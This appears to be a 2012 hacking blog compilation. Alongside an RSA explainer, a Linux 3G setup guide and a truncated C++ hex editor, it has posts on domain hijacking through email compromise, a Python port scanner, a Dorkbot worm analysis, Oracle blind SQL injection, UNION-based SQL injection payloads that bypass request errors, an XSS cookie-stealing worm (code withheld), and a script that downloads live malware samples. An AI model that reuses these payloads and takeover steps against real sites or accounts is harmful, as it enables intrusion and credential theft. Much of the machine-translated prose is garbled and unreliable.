Sunday, December 30, 2012

RSA encryption algorithm, or they are afraid the feds America

RSA encryption algorithm, or they are afraid the feds America



Today I want to tell you about an excellent encryption algorithm RSA. The idea to write the message appears in the writing of code encryption botnet. The solution is technology that the U.S. government at the time were very much afraid. Even banned a program, on some lines written on Perl'e, and the people to protest, printed on T-shirts the code of this program.


So a little history:
RSA (alphabetic abbreviation of the names Rivest, Shamir and Adleman) - a cryptographic public key algorithm. RSA algorithm is the first of a type suitable for both encryption and digital signatures. The algorithm is used in a large number of cryptographic applications. published in November 1976 article Whitfield Diffie and Martin Hellman, "New Directions in Cryptography" turned the idea of cryptographic systems, laying the foundations of public key cryptography. Subsequently developed Diffie-Hellman-Merkle allows two parties to get a shared secret key over an insecure channel. However, this algorithm did not solve the problem of authentication. Without additional funds, one of the users could not be sure that he exchanged with the key of the user, which he needed. After reading this article, three scientists Ronald Rivest (Ronald Linn Rivest), Adi Shamir (Adi Shamir) and Leonard Adleman ( Leonard Adleman) from the Massachusetts Institute of Technology (MIT) have begun the search for a mathematical function that would allow you to implement formulated Whitfield Diffie and Martin Hellman model of a cryptographic system with a public key. After working on more than 40 possible variants, they managed to find an algorithm based on the difference in how easy to find large prime numbers and the difficulty lay factoring the product of two large prime numbers, which later received the name of the RSA. The system was named for the first letters of the names of its creators. Description RSA was published in August 1977 in the journal Scientific American. RSA authors supported the idea of its active distribution. In turn, the National Security Agency (USA), for fear of using this algorithm in the state structures, for several years unsuccessfully called for halting the spread of the system. The situation sometimes reaches the point of absurdity - for example, when a programmer Adam Beck (Adam Back) described in Perl algorithm RSA, consisting of five lines, the U.S. government banned the distribution of this program outside the country. People are dissatisfied with such restrictions, in protest of the printed text of the program on their shirts. In 1977, the creators of RSA was encrypted phrase «The Magic Words are Squeamish Ossifrage» («The magic words - is squeamish vulture"). For decoding was promised a reward of $ 100. Only at the end of 1995 could practically implement disclosure RSA cipher for a 500-character key. For six months, more than 600 volunteers donate CPU 1600 machines (two of which were fax machines). Coordination took place through the Internet, and it was one of the first such distributed computing projects. This award winners donated to the Free Software Foundation. in December 1997 has been published information according to which British mathematician Clifford Cox (Clifford Cocks), who worked in the Government Communications Headquarters (GCHQ) UK, described a similar RSA cryptosystem in 1973.


A Little about encryption : - Depending on the structure of the keys used encryption methods are divided into:
Symmetric encryption: outsiders can be known encryption algorithm, but a small portion is unknown classified information - the key is the same for the sender and the receiver of the message;
 Examples: DES, 3DES, AES, Blowfish, twofish. asymmetric-encryption: outsiders may know the encryption algorithm, and possibly the public key, but do not know the private key known only to the recipient. Cryptographic system with a public key is now widely used in a variety of network protocols, such as the protocols TLS and its predecessor SSL (underlying HTTPS), as well as SSH, PGP, S / MIME, etc.
The Russian standard, using asymmetric encryption. Currently asymmetric cryptography based on public key RSA (stands for Rivest, Shamir and Aldeman - creators of the algorithm) uses most of the products on the security market. cryptographic It is based on the complexity of factoring large numbers - namely, to exceptionally difficult task to determine the private key on the basis of open, since this would require to solve the problem of the existence of divisors of an integer. Most systems use a cryptographically strong 1024-bit and big numbers.

 Consider RSA algorithm from a practical point of view.

First we need to generate a public and private key: -Take two large prime numbers P and q. define-n, by multiplying P on q (n = P * q). -We choose a random number, which we call d. This number must be prime to the product of (p-1) * (q-1). - We define a number e, for which the following relation is true (e * d) mod ((p-1) * (q- 1)) = 1. Hazovem-public key of e and n, and the secret - d and n.

__________________________________________________________________________________

To encrypt data on the public key {e, n}, you will need: -encrypted text divided into blocks, each of which can be expressed as the number of M (i) = 0,1,2 ..., n-1 (ie, only up to n-1). cipher-text, considered as a sequence of numbers M (i) by the formula C (i) = (M (I) ^ e) mod n. To decrypt the data using the private key {d, n}, do the following calculation: M (i) = (C (i) ^ d) mod n. As a result, you receive a set of numbers M (i), which are the source code. _________________________________________________________________________________

 The following example illustrates the encryption algorithm RSA: encrypts and decrypt the message "CAB" algorithm RSA. For simplicity we take small numbers - it will reduce our calculations. We choose p = 3 and q = 11. We define n = 3 * 11 = 33. Haydem-(p-1) * (q-1) = 20. Therefore, d is equal to, say, 3: (d = 3). , choose a number e as follows: (e * 3) mod 20 = 1. So e will be the same, for example, 7: (e = 7). represent-key encrypted message as a sequence of numbers in the range from 0 to 32 (Unforgettable, that ends at n-1). The letter A = 1, B = 2, C = 3. now encrypts the message using the public key {7.33} C1 = (3 ^ 7) mod 33 = 2187 mod 33 = 9; C2 = (1 ^ 7) mod 33 = 1 mod 33 = 1; C3 = (2 ^ 7) mod 33 = 128 mod 33 = 29; Now decrypt data using a private key {3.33}. M1 = (9 ^ 3) mod 33 = 729 mod 33 = 3 (C); M2 = (1 ^ 3) mod 33 = 1 mod 33 = 1 (A); M3 = (29 ^ 3) mod 33 = 24 389 mod 33 = 2 (B), data decrypted! And so it acts this algorithm RSA! The article, though not big, but useful, and brings valuable information for both novice and experienced programmers.


Thanks,

 
Author at

Monday, December 10, 2012

Hijacking DOMAIN

Hijacking DOMAIN 

The domain hijacking is a form a little out of the mainstream because it would be a little more focused on social engineering because it is part of an attack directed at a specific victim in this case would be the original person and owner of the domain is that victim who owns the email that made the registration, the email I buy the domain # Epico since in certain forms intervene an email is much easier to make the intrusion itself to this website for brute force tools abound, phishing, email cracking or just send an email and wait wing victim to open it using a little social engineering we are talking about 65% in each wing victim sending mail. Well for that we must understand that in the hijacking DOMAIN two things only start the DNS and hosting.
Which means each and everyone must know both the hosting and DNS has its own panel but where would we focus on specifically PANEL which can handle DNS routing services.

Now go back to the attack of linking to domain hijacking first thing we have is the access panel for it having DNS information:
> The name of the domain that will make the kidnapping.
> The email address to which the record was made of the domain.

This useful information is very easy to get what we can do with a domain whois domain the victim and we introduce a simple enter and begin the search for information about the domain in which we are performing the attack once it finishes loading the data we WHOIS RECORD is where e-mail, provided by XXX company registration, ETC.

Once you take control over this information and taking into account the administrative mail DNS service proceeds to intervene once made the account headed domain provider and we click on the and automatically sends us link to reset your password to enter the DNS PANEL clear this was done after the intervention to that email and in it we would realize only a redirect page if not all domains registered to that email account. # END # 1
Author at

Thursday, November 29, 2012

A Simple Port Scanner [Python]

A Simple Port Scanner [Python]


#!/usr/bin/python
import sys,os
from socket import *
os.system('clear')

def about():
    print "###################################################"
    print "# Simple Port Scanner"
    print "# Coded By nu11_()_v0!d"
    print "# Powered By Team OpenFire"
    print "# Blog: infosec-regeneration.blogspot.com"
    print "#"
def usage():
    print "[?] usage : ./portScan.py 1 65500 IP --- All PORTS"
    print "[?] usage : ./portScan.py 21      IP --- Single PORT"

def main():
    if (int(len(sys.argv))==1):
        about()
        usage()

    if (int(len(sys.argv)) == 3):
        #one port
        about()
        try:socket(AF_INET, SOCK_STREAM).connect((sys.argv[2], int(sys.argv[1]))); print "[!] PORT : ", int(sys.argv[1])," OPEN"
        except: pass

    if (int(len(sys.argv)) == 4):
        #range
        about()
        port = 0
        for port in range( int(sys.argv[1]) , int(sys.argv[2]) ):
            try:socket(AF_INET, SOCK_STREAM).connect((sys.argv[3], port)); print "[!] PORT : ", port," OPEN"
            except: pass
main()
print "http://infosec-regeneration.blogspot.com"
print "###################################################"
Author at

Sunday, November 18, 2012

Skype and Messenger Used to Spread a new type of Worm


Skype and Messenger Used to Spread a new type of Worm
[found on underground forums]

Since Saturday, there's a worm actively spreading through (mainly) Skype as well as Messenger (Windows Messenger, Microsoft MSN Messenger).

Someone who's infected with this worm will send you the following message:

[IMG]
Message in German asking to check your cool pictures

The link refers to goo.gl and is actually Google's URL Shortener service. You'll land on Hotfile.com, which is a legitimate file sharing website. (it's not the first time Hotfile has been used to spread malware, read more here. The file has already been removed by Hotfile.)
Some note regarding it :
Code:
 You should [B]never[/B] trust an email which has:
 
- only a URL included in the message
- crappy spelling and grammar if there is content in the message
- been sent out to everyone in the sender's address book
- been sent from an unknown sender
- promises you can buy something for a very cheap price
- No subject or strange subjects ( eg.: "[I]0 enjoy yourself[/I]" )
 
Never reply to this kind of email, simply delete it and don't look back ;) .
 
  If you have downloaded a program and you are unsure about
its intentions, you can always      upload it to VirusTotal or other online
virusscanners (VirScan, Jotti). Keep in mind that if a file is not detected by
any engine, it is not necessarily clean!

Now the actual Post continues....
[IMG]
Links refers to Hotfile and will immediately download a ZIP file.

Positive thing is that it is a ZIP file and not an EXE. This means the user still has to manually unpack and run the malware. Inside our ZIP file we'll find the following file, which is covered as a Skype setup file:
[IMG]

When executing this file, another file (a random 4 character EXE) will be dropped to the %appdata% folder of the currently logged on user:
[IMG]

This file will try to connect to api.wipmania.com, waiting for instructions. Additionally, it tries to connect to the following IP addresses:


Now, how do we know how it spreads and which messages it can display? The file extracted from the ZIP archive - skype_05102012_image.exe looks for the following processes:
msnmsgr.exe
msmsgs.exe
skype.exe

It will then automatically send a message, based on the OS language. It uses the following list to spread:
1.tas ir jusu jauna profila bildes?
2.seo do grianghraf prl nua?
3.ont uusi profiilikuva?
4.nai aft a fotografa profl sas?
5.sa kvo profili lusankary aquesta
6.s la teva nova foto de perfil?
7.hey ito sa iyong larawan sa profile?
8.hey lanh tieu cua ban?
9.hey ini foto profil?
10.hei zhni de gn zilio zhopin ma?
11.ni phaph porfil khxng khun?
12.hej er det din nye profil billede?
13.hej je to vasa nova slika profila?
14.hej je to tvuj nov obr zek profilu?
15.hei er dette din nye profil bilde?
16.hey la tua immagine del profilo nuovo?
17.hej to jest twj nowy obraz profil?
18.hej jeli ovo vasa nova profil skila?
19.hey bu yeni profil pic?
20.hej detta är din nya profilbild?
21.tung, cka paske lyp ti nket fotografi?
22.moin , kaum zu glauben was für schöne fotos von dir auf deinem profil
23.hey is dit je nieuwe profielfoto?
24.ez az j profil ksta tu foto de perfil nuevo?
25.hey essa sua foto de perfil? rsrsrsrsrsrsrs
26.hey c'est votre nouvelle photo de profil?
27.hoi schoni fotis hesch du uf dim profil ppe n
28.lol is this your new profile pic?


It will then add the link and subsequently adds your username after the equals '=' sign :
http://goo.gl/QYV5H?img=


Let's take a closer look at the files:

skype_05102012_image.exe
Result: 23/44
MD5: 98f74b530d4ebf6850c4bc193c558a98
Anubis Report
Malwr Report
ThreatExper Report


36A9.exe
Result: 16/44
MD5: 0d4b7f4c1731c91dff56afce0ecf37c5
Anubis Report
Malwr Report
ThreatExpert Report


The malware is commonly identified as Worm.Dorkbot and Worm.Agent or Generic Trojan.

Microsoft provides a description:
Win32/Dorkbot is a family of IRC-based worms that spreads via removable drives, instant messaging programs, and social networks. Variants of Win32/Dorkbot may capture user names and passwords by monitoring network communication, and may block websites that are related to security updates. It may also launch a limited denial of service (DoS) attack.

On my testmachines there was no additional malware downloaded, even after replicating a few times. Several variants of malware can however always be downloaded, whether it's ransomware, rogueware....



Conclusion

Worms spreading through Facebook, Twitter as well as IRC, MSN and Skype is nothing new. Still, it appears to be very successful as human curiosity wins in cases of doubt:
"Do I really have (embarassing) pictures of myself on this website? Better take a look!"

No, no, no!

Never click on unknown links, especially when a URL shortener service like goo.gl is used. (others are for example t.co, bit.ly, tinyurl, etc.)
Don't be fooled by known icons or "legit" file descriptions, this can easily be altered.

Even if you clicked the link and you're not suspicious, you should be when a file is downloaded and no pictures are shown, but just an EXE file.

For checking what is really behind a short URL, you can use:
http://getlinkinfo.com/
http://longurl.org/

For checking whether a file is malicious or not:
https://www.virustotal.com/
http://virusscan.jotti.org/
Author at

Advance Oracle Blind SQL Injection

Advance Oracle Blind SQL Injection


Had a job to test an application few days back. Its an application using java applet.
Hum..when I heard its an application via java applet what came in my mind

1 - Internet Explorer will be a better browser
*which is true in this case..since to use other browser I need to install Java jiniator(something like that)
*no extra addon such as hackbar/tamper data available in IE

2 - Try to hook using proxy tools burp/paros/webscarap/zap etc.
*Success,but no use. Since the data is encrypted well. Failed to crack/reverse them :(
*Tried to use JavaSnoop. Failed to setup it.hahaha

3 - Manual testing!!!
* The best choice.

The developer of this application really confident with their applications. They already guaranteed that there's no bug in their application. So that's why the company that hire them asked me to test the application..

So,after tested it for the 1st day..it is true the application is hard to hack..not because the application,but because the java applet.
How about the application then? LOTS of vulnerability.
I found multiple forms that vulnerable to Oracle Blind SQL Injection.

Then came another problem.
Most of the forms only accept a little amount of characters. some of them accept 30chars..some of them 40chars..the longest acceptable chars is 90chars where I found in one of the vulnerable form.

It is a BLIND SQLI with limitation of characters.

At first I already informed this to the company,but then one of the developer said that..
"So what?..You cannot extract anything just by that 1 or 1=1 1=2 thing right?haha"

Really pissed me off. So I need to extract something from this Blind Sqli to show the impact to this developer guy.

A little of reading and googling found that, for Blind Sqli in Oracle,we need a lots of chars to successfully extract the data.
The only hope I have now is the only form that accept 90chars.

So the how I'm confident it is a blind sqli?
Simple.
When I'm trying to search for " john ", the result of john's profile will appear.
but if I try to search for " john' ", a different profile or a blank profile appear.

So I tried
john' or 1='1 TRUE
john' or 1='2 FALSE
yerp! it is a blind sqli.

Had a read in pentestmonkey cheat sheet and found out that we can use like this as well. called String Concatenation


jo'||'hn = TRUE
jo'||hn = FALSE
jo'||h||'n = TRUE

So here's the idea.

jo'|| INJECTION HERE if TRUE 'h' else 'x' || 'n

- let say we query to find a first letter of current_user='U' ,so if the current_user's first letter start with U,it will be 'h' which completed the string equals jo'||h||'n
- if the 1st letter not start with U, it will be else 'x'..so the string become jo'||x||'n which is not a valid profile available in the application.

added up a little example on this tutorial [IMG]
In order to ensure that my instinct is correct,I proceed with another testing.
search=Zack' and 1='1
TRUE!
FALSE!

in oracle, this query can be use as well for injection
let say we search for:

this will be a false statement. since it'll be something like Za'ck.
if we search for
it'll be a TRUE query. and a valid info about Zack will appear.
same as below query,it'll resulting a TRUE statement.
so what are we going to do is,our injection will be like this
where in above injection,if the injection returns a valid value,(TRUE),it'll be
where else,if FALSE,it'll be
which is not a valid user available (Zaxk).

a simple example to query like below
What query above is about? It will try to query the database banner from v$version (which has string Oracle in it).
after that, it'll try to test the first character (specified by the substr() call) and compared to the letter 'A'.
If the first letter start with 'A', the query will be a valid statement and will returns 'c', if NO, it'll returns 'X'.
hope you get the idea:)...
Author at

Friday, November 16, 2012

Bypassing 404 Bad Request Error

Bypassing 404 Bad Request Error



# 400 bad request #
If we have error 400 bad request like this

    site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, ?29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 +--+/


it's mean : Your browser sent a request that this server could not understand .
and to bypassing this error

first we need to know from where this error begin do like this,

    site.com/somthing.php?id=1' union

nothing happening no 400 bad request error

    site.com/somthing.php?id=1' union select

nothing happening no 400 bad request error

    site.com/somthing.php?id=1' union select 1 +--+/

nothing happening no 400 bad request error

    site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 +--+/
nothing happening no 400 bad request error

    site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 +--+/

Oh 400 bad request error
now we know this error begining from column 19 that's appear no error and to bypassing this error we will add --+%0A after nomber of column like this

    19--+%0A,20--+%0A,21--+%0A etc ....

DEMO
http://site.com/somthing.php?id=1'and false UNION select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+%0A,20--+%0A,21--+%0A,22--+%0A,23--
+%0A,24--+%0A,25--+%0A,26--+%0A,27--+%0A,28--+%0A,29--+%0A,30--+%0A,31--+%0A,32--
+%0A,33--+%0A,34--+%0A,35--+%0A,36--+%0A,37--+%0A,38--+%0A,39--+%0A,40--+%0A,41--
+%0A,42--+%0A,43--+%0A,44--+%0A,45--+%0A,46--+%0A,47--+%0A,48--+%0A,49--+
Thank You !!
Author at

Constructing an XSS Worm

Constructing an XSS Worm



Website security A step-by-step explanation of how an attacker creates an XSS worm


If you find the formatting of this article to be off or hard to read on HBH (as I do, sensitive eyes. HBH's repository is great, but you can only do so much to make a text file pretty without allowing it the be a text file in full), please



Before anyone flames me, the code in this article is purposefully flawed. It will not work. A programmer should be able to get it to work in a matter of minutes. I removed some code and modified other stuff so that skiddies don't pick it up. This article is meant for understanding, not as a contribution of code.

A while back, I was poking around a web 2.0 site. I noticed something rather interesting: every single prefernce for users had it's own file. This was probably done because the site, which was AJAX based, modified user information via AJAX, and therefore often times there was only one value being edited at a time. I started poking around these, and I found out early on that all data sanitation was done with Javascript. I'm assuming this is because the developer was more comfortable with javascript, and didn't use PHP for anything except what he had to (editing database fields, etc.) Because filtering was done via javascript, I figured it wasn't done on the PHP side (I was correct), so if I could access the file directly, I was in buisness.

It worked. site.com/users_neighborhood.php was accessable, and when I edited my neighborhood, I was able to insert a cookie stealer. The cookie stealer employed my favorite concept, albeit not always possible: the image. Which brings me to my first segment of code, the cookie stealer itself:



This code simply created a PNG image and set the file's output content-type to PNG.

And the Javascript looked like this:


So, easy part down. Next is the propagation technique. I had a PHP program, and it contains a variable with the entire cookie in it. So the obvious thing to do at this point was to use sockets to connect to our target site's users_neighborhood.php page with the hijacked cookie. I did this by opening a socket and passing data to it. Here's the code:



This section of code just set up all the variables used later.


This section is a function which allows us to create a valid HTTP/1.1 packet with POST data and cookie data in it.

this section created our network connection to the site


This section of code wrote the HTTP packet to the site



What we have done is used the "XSS" exploit in the site steal to cookie. Our cookie stealer script not only logs cookies, but it is also used to authenticate us as that user and grant us the ability to edit THEIR content, and steal cookies using their page as well.


LEGAL STUFF/DISCLAIMER: THE CODE IN THIS TUTORIAL WAS EDITED TO ENSURE THAT IS DOES NOT WORK PROPERLY. THIS WAS DONE ON PURPOSE TO AVOID THE USE OF THIS CODE FOR ILLEGITIMATE PURPOSES. THE CODE IS FOR POC PURPOSES ONLY, MEANT OT DEMONSTRATE THE EXTENSION OF XSS HOLES. DON'T DO BAD STUFF, CAUSE IT'S NOT ON ME IF YOU DO. THIS WORM WAS CREATED AND TESTED IN A CONTROLLED ENVIRONMENT.

THANK YOU ALL ...!!!
Author at

Setting up 3g mobile broadband in linux/backtrack (The Easy Way)

Setting up 3g mobile broadband in linux/backtrack (The Easy Way)


Now recently I just bought 3g mobile broadband dongle to access the internet on the weekends when we go out to our ranch. Now it works perfect for windows but I still rather run it under linux and I've tried so many different options tutorials ETC. Everybody make it sound 300x harder than it actually is. This doesn't take much computer know how to do. BTW this is all done with one program called Sakis3g awsome little tool with lots of great features like an interactive GUI. Now there are some key notes you have to know before we start.

REMOVE THE SIM CARD FROM THE USB DONGLE AND INSERT IT INTO YOUR PHONE JUST TO MAKE SURE IT DOES NOT A PIN LOCK IF IT DOES REMOVE IT THE PIN LOCK SHOULD BE SOMETING LIKE 0000 OR 1234 PUT MOST OF THEM THESE DAYS COME UNLOCKED.


Let's get started

About Sakis3g

Sakis3G is a tweaked shell script which is supposed to work out-of-the-box for establishing a 3G connection with any combination of modem or operator. It automagically setups your USB or Bluetooth™ modem, and may even detect operator settings. You should try it when anything else fails!
Now let's browse to Sakis3G and scroll down until you see the download section if you don't know witch version to download. Just download the the first one
i386 - Fullversion
 
 
Now before we run it lets go back to windows and check the 3G dongle setting. First, most important thing is everything you see and take note of is case sensitive. Now what do we need.
 
1. Name of your APN incase sakis3g does not acquire it automatically.
2. Your user name and password
Now the password might be a bit tricky as you can see in mine my user name is Zain and my password is a four letter or digit password. Most if not all companies would have something like 0000 1111 1234 or it can be exactly the same as your user name.
***NOTE***
Notice my APN is all lower case and my username has a capital Z at the beginning and if my password where to be the same as my username it will also have a capital Z at the beginning.
 
 
Now after we got all the information we needed let's reboot into linux. Make sure you are not connected to any to anything before you start. Browse to where you have downloaded Sakis3g and run these commands.

gunzip sakis3g.gz
chmod +x sakis3g
./sakis3g --interactive
 
 
 
 Once you run the interactive GUI it will give you four options pick option one and press enter.
 
 
 It will the ask you what interface pick the first one like I have and press enter.
 
 
Good if you get this screen that means it has automatically found your APN so what is left to do is put in our username and password. Remember case sensitive information.
 
 
 
 
 Now you just get this message when I first saw this I thought it was an error massage but what it was actually saying I was connected.
***NOTE***
The only way you'll know your connected is with this message and will not show up in your connection list in Wicid manager. 
 
 
 That's it for this tutorial if you have any questions feel free to ask.
 
Author at

Thursday, November 15, 2012

Windows Malware samples Database Downloader Script[bash]

Windows Malware samples Database Downloader Script[bash]


--- By nu11_()_v0!d
A Team OpenFire Production




Need a large number of malware samples for Windows ?
Make ur Malware database for Research ?
>> >> >>
>> >>
>>
Here is a bash script I whipped up to download 'executable' on an hourly basis from Clean MX's mailing list. This
places all samples in a folder I created in /usr/share/malware

Name it windows_malware_database_TOF.sh

rootdir="/usr/share/malware"
day=`date +%Y%m%d`
 
url=`echo "wget -qO - http://lists.clean-mx.com/pipermail/viruswatch/$day/thread.html |\
awk '/\[Virus/'|tail -n 1|sed 's:\": :g' |\
awk '{print \"http://lists.clean-mx.com/pipermail/viruswatch/$day/\"$3}'"|sh`
 
filename=`wget -qO - http://lists.clean-mx.com/pipermail/viruswatch/$day/thread.html |\
awk '/\[Virus/'|tail -n 1|sed 's:": :g' |awk '{print $3}'`
 
links -dump $url$filename | awk '/Up/'|grep "TR\|exe" | awk '{print $2,$8,$10,$11,$12"\n"}' > $rootdir/$filename
 
dirname=`wget -qO - http://lists.clean-mx.com/pipermail/viruswatch/$day/thread.html |\
awk '/\[Virus/'|tail -n 1|sed 's:": :g' |awk '{print $3}'|sed 's:.html::g'`
 
rm -rf $rootdir/$dirname
mkdir $rootdir/$dirname
 
cd $rootdir
 
grep "exe$" $filename |awk '{print "wget \""$5"\""}' | sh
ls *.exe | xargs md5 >> checksums
mv *.exe $dirname
 
rm -r $rootdir/*exe*
mv checksums $rootdir/$dirname
mv $filename $rootdir/$dirname
 
Use It for Your Fruitful; Research !!!!
Need suggestion !!!
Author at

Tuesday, September 25, 2012

A PRIVATE HEX EDITOR CODED ON C++

A PRIVATE HEX EDITOR CODED ON C++

COMPILE AND RUN


1. Main.cpp
Code:
    #include "Editor.hpp"
     
    Console console;
    HexEditor hexedit;
    bool quit = false;
    void draw();
    void loop();
    void processInput(char key);
     
    int main() {
        loop();
        return 0;
    }
     
    void loop() {
        console.init("Psych Hex Editor - Created by Psych.gs");
        draw();
        char input;
        while (!quit) {
            input = getch();
            processInput(input);
            draw();
        }
    }
     
    void draw() {
        console.clear();
        console.write(0,23,"Keys: ESC = Exit  ENTER = Open File  WASD = Navigate Tab = Edit  Z = Save",FOREGROUND_GREEN|BACKGROUND_BLUE);
        console.write(0,24,"Q = Scrolldown E = Scrollup Space = Switch View F = Find",FOREGROUND_BLUE|BACKGROUND_GREEN);
        hexedit.draw(&console);
        console.render();
    }
     
    void processInput(char key) {
        if (key == VK_TAB) {
            hexedit.go_edit(&console);
        }
        if (key == VK_ESCAPE) {
            quit = true;
        }
        if (key == VK_RETURN) {
            hexedit.load_file();
        }
        if (key == 'd' || key == 'D') {
            hexedit.select(1);
        }
        if (key == 'a' || key == 'A') {
            hexedit.select(-1);
        }
        if (key == 's' || key == 'S') {
            hexedit.select(16);
        }
        if (key == 'w' || key == 'W') {
            hexedit.select(-16);
        }
        if (key == 'q' || key == 'Q') {
            hexedit.scroll(1);
        }
        if (key == 'e' || key == 'E') {
            hexedit.scroll(-1);
        }
        if (key == 'z' || key == 'Z') {
            hexedit.save();
        }
        if (key == 'f' || key == 'F') {
            hexedit.find(&console);
        }
        if (key == VK_SPACE) {
            hexedit.switchmodes();
        }
    }
2. Editor.hpp

Code:
    #include 
    #include 
    #include 
    #include 
     
    void error(const char *msg);
     
    class Console {
    private:
        CHAR_INFO console_buffer[25][80];
        HANDLE cHandle;
    public:
        void init(const char *title);
        void write(int x, int y, const char *c, WORD attributes);
        void render();
        void clear();
    };
     
    struct Editable {
        short x;
        int y;
        char data;
    };
     
    class HexEditor {
    private:
        char fname[64];
        char completePath[255];
        long fsize;
        bool hasFile;
        char *fileByte;
        Editable *edit;
        Editable *strEdit;
        long selected,lc;
        int sTimes;
        long scrollAmount;
        void gen_edit();
        void grab_file_info();
        void findandselect(const char *find);
        void findtext(Console *g);
        void findbytes(Console *g);
        void converttobytes(char *bytebuf, const char *text);
        bool startsWith(const char *c1,const char *c2);
        short mode;
    public:
        void draw(Console *g);
        void load_file();
        void select(int add);
        void scroll(int add);
        void switchmodes();
        void go_edit(Console *g);
        void save();
        void find(Console *g);
        bool editMode;
    };

3. Editor.cpp

Code:
    #include "Editor.hpp"
     
    void m(const char *m) {
        MessageBoxA(0,m,m,0);
    }
     
    void error(const char *msg) {
        MessageBoxA(0,msg,"Psych Hex Editor|Error",0);
    }
     
    void Console::init(const char* title) {
        cHandle = (HANDLE)GetStdHandle(STD_OUTPUT_HANDLE);
        if (cHandle == INVALID_HANDLE_VALUE) {
            error("Invalid handle value of std output handle.");
        }
        SetConsoleTitle(title);
    }
     
    void Console::clear() {
        for (int x = 0; x < 80; x++) {
            for (int y = 0; y < 25; y++) {
                console_buffer[y][x].Char.AsciiChar = '\0';
                console_buffer[y][x].Attributes = FOREGROUND_GREEN | BACKGROUND_BLUE;
            }
        }
    }
     
    void Console::write(int x, int y, const char *c, WORD attributes) {
        int len = strlen(c);
        for (int i = 0; i < len; i++) {
            console_buffer[y][x+i].Char.AsciiChar = c[i];
            console_buffer[y][x+i].Attributes = attributes;
        }
    }
     
    void Console::render() {
        COORD size = {80,25};
        COORD pos = {0,0};
        SMALL_RECT region = {0,0,79,24};
        WriteConsoleOutput(cHandle,(CHAR_INFO*)console_buffer,size,pos,&region);
    }
     
    void HexEditor::draw(Console *g) {
        char outBuf[80];
        if (hasFile) {
            sprintf(outBuf,"%s %f kb",fname,(float)fsize/1024);
        } else {
            sprintf(outBuf,"No File Loaded");
        }
        g->write(0,0,outBuf,FOREGROUND_RED|FOREGROUND_GREEN|FOREGROUND_BLUE|FOREGROUND_INTENSITY|BACKGROUND_BLUE);
        char out[4];
        scrollAmount = sTimes*16;
        if (hasFile) {
            for (lc = 0; lc < fsize; lc++) {
                if (lc < 304 && lc+scrollAmount < fsize) {
                    switch (mode) {
                        case 0:
                            sprintf(out,"x%x",edit[lc+scrollAmount].data);
                            break;
                        case 1:
                            sprintf(out,"%c",edit[lc+scrollAmount].data);
                            break;
                    }
                    if (selected == lc+scrollAmount) {
                        if (editMode) {
                            g->write(edit[lc+scrollAmount].x,edit[lc+scrollAmount].y-sTimes,out,FOREGROUND_BLUE|FOREGROUND_RED|FOREGROUND_GREEN|FOREGROUND_INTENSITY);
                        } else {
                            g->write(edit[lc+scrollAmount].x,edit[lc+scrollAmount].y-sTimes,out,FOREGROUND_BLUE|FOREGROUND_RED|FOREGROUND_GREEN);
                        }
                    } else {
                        g->write(edit[lc+scrollAmount].x,edit[lc+scrollAmount].y-sTimes,out,BACKGROUND_BLUE|BACKGROUND_RED|BACKGROUND_GREEN);
                    }
                }
            }
        }
    }
     
    void HexEditor::select(int add) {
        if (selected+add < 0 || selected+add == fsize || selected+add > fsize) {
            return;
        }
        selected += add;
    }
     
    void HexEditor::scroll(int add) {
        if (sTimes+add < 0 || sTimes+add > (fsize-288)/16) {
            return;
        }
        sTimes += add;
    }
     
    void HexEditor::switchmodes() {
        if (mode != 1 || mode > 1) {
            mode++;
        } else {
            mode = 0;
        }
        gen_edit();
    }
     
    void HexEditor::load_file() {
        OPENFILENAME ofn;
        ZeroMemory(&ofn,sizeof(ofn));
        ofn.lStructSize = sizeof(OPENFILENAME);
        ofn.lpstrFilter = "All Files (*.*)\0*.*\0";
        ofn.lpstrFile = completePath;
        ofn.nMaxFile = 255;
        ofn.Flags = OFN_EXPLORER | OFN_FILEMUSTEXIST;
        ofn.lpstrDefExt = "";
       
        if (GetOpenFileName(&ofn)) {
            hasFile = true;
            grab_file_info();
        }
    }
     
    void HexEditor::grab_file_info() {
        SHFILEINFOA sfi = {0};
        SHGetFileInfo(completePath,-1,&sfi,sizeof(sfi),SHGFI_DISPLAYNAME);
        sprintf(fname,"%s",sfi.szDisplayName);
        FILE *fp = fopen(completePath,"rb");
        fseek(fp,0,SEEK_END);
        fsize = ftell(fp);
        fseek(fp,0,SEEK_SET);
        fileByte = (char*)malloc(sizeof(char)*fsize);
        fread(fileByte,1,fsize,fp);
        fclose(fp);
        gen_edit();
    }
     
    void HexEditor::gen_edit() {
        edit = (Editable*)malloc(sizeof(Editable)*fsize);
        short currX = 0;
        int currY = 3;
        for (lc = 0; lc < fsize; lc++) {
            if (fileByte[lc] < 0x20 && mode == 1) {
                edit[lc].data = ' ';
            } else {
                edit[lc].data = fileByte[lc];
            }
            edit[lc].x = currX;
            edit[lc].y = currY;
            if (currX != 75) {
                currX += 5;
            } else {
                currY++;
                currX = 0;
            }
        }
    }
     
    void HexEditor::go_edit(Console *g) {
        editMode = true;
        if (mode == 0) {
            g->clear();
            g->write(0,24,"Please enter a valid hexadecimal number-",FOREGROUND_GREEN|BACKGROUND_BLUE);
            draw(g);
            g->render();
            short hex;
            char c[4];
            c[0] = '0';
            c[1] = 'x';
            c[2] = getch();
            if ((c[2] > 0x29 && c[2] < 0x3A) || (c[2] > 0x60 && c[2] < 0x67) || (c[2] > 0x40 && c[2] < 0x47)) {
                sscanf(c,"%x",&hex);
                edit[selected].data = (char)hex;
                g->clear();
                g->write(0,24,"Please enter a valid hexadecimal number-",FOREGROUND_GREEN|BACKGROUND_BLUE);
                draw(g);
                g->render();
                c[3] = getch();
                if ((c[3] > 0x29 && c[3] < 0x3A) || (c[3] > 0x60 && c[3] < 0x67) || (c[2] > 0x40 && c[2] < 0x47)) {
                    sscanf(c,"%x",&hex);
                    edit[selected].data = (char)hex;
                    fileByte[selected] = (char)hex;
                    editMode = false;
                    return;
                } else {
                    editMode = false;
                    return;
                }
            } else {
                editMode = false;
                return;
            }
        }
        if (mode == 1) {
            g->clear();
            g->write(0,24,"Please enter a new character-",FOREGROUND_GREEN|BACKGROUND_BLUE);
            draw(g);
            g->render();
            char c = getch();
